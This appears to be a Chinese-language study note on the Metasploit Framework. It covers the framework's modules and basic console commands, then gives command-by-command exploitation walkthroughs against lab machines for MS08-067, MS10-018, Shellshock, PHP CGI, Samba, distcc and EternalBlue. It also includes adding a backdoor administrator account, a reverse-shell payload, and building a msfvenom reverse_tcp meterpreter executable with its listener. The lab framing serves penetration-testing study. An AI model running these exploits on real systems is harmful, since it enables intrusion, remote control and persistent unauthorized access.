MSF概述
- 全称:The Metasploit Framework
- 简称:MSF
- 描述:一个免费、可下载的漏洞框架
- 功能:获取、开发、实施计算机软件漏洞攻击
- 领域:渗透测试、漏洞研究
MSF目录结构解读
- Modules 模块目录
- Auxiliary 辅助脚本,嗅探、破解、注入、漏洞挖掘
- Encoders 编码工具
- Exploits 漏洞脚本
- Nops
- Payloads 参数设置
- Post 提权,获取hash
- Data
- Plugins load加载 插件库
- Scripts meterpreter脚本
- Tools 工具
MSF基本命令
- Msfconsole
- 帮助命令:?
- 搜索命令:search
- 使用模块:use
- 返回上级:back
- 连接地址: connect
- 显示信息:info
- 作业管理:jobs
- 退出:quit/exit
MSF渗透测试
- smb漏洞利用(MS08-067)
- 靶机:WinXPenSP3
- 步骤
msfconsole use exploit/windows/smb/ms08_067_netapi show options set RHOST 192.168.0.1 run shell net user net user test test /add net user net user test /del - 浏览器漏洞利用(MS10-018)
- 靶机:WinXPenSP3
- 步骤
msfconsole use exploit/windows/browser/ms10_018_ie_behaviors set SRVHOST 192.168.244.4 (本机ip) set PAYLOAD windows/meterpreter/bind_tcp run #等待靶机执行 jobs sessions sessions -i 1 shell
- 应用软件格式漏洞利用
- 靶机:WinXPenSP3
- 步骤
msfconsole use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof set payload windows/exec set CMD calc.exe set FILENAME ceshi.rtf run
- samba服务漏洞利用
- 靶机:VueHub
- 步骤
msfconsole use exploit/linux/samba/is_known_pipename set RHOSTS 192.168.0.1 run id
- Bash Shellshock漏洞利用
- 靶机:VueHub
- 步骤
msfconsole use exploit/multi/http/apache_mod_cgi_bash_env_exec set RHOSTS 192.168.244.6 (vnt ip) set RPORT 8080 set TARGETURI /victim.cgi run shell id
- PHP CGI漏洞利用
- 靶机:VueHub
- 步骤
msfconsole use exploit/multi/http/php_cgi_arg_injection set RHOSTS 192.168.244.6 (vb ip) set RPORT 8080 run shell id - Distcc后门漏洞利用
- 靶机:Metasploitable2-Linux
- 步骤
use exploit/unix/misc/distcc_exec set payload cmd/unix/reverse_perl set rhost 192.168.0.1 (ms ip) set lhost 192.168.0.2 (kali自己的) run id - 永恒之蓝
- 靶机:windows7
- 步骤
msfconsole use exploit/windows/smb/ms17_010_eternalblue set rhosts 192.168.209.129 set payload windows/x64/shell/bind_tcp run net user test test /add net localgroup administrators test /add net user net user test /del
Metasploit 制作脚本
- msfvenom 简介 msfvenom 是msfpayload,msfencode的总称,可以生成脚本
- 制作脚本
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.209.128 lport=5445 -f exe >hello.exe
- 监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 5445
exploit -j
- 攻击
screenshot
ipconfig
shell
run vnc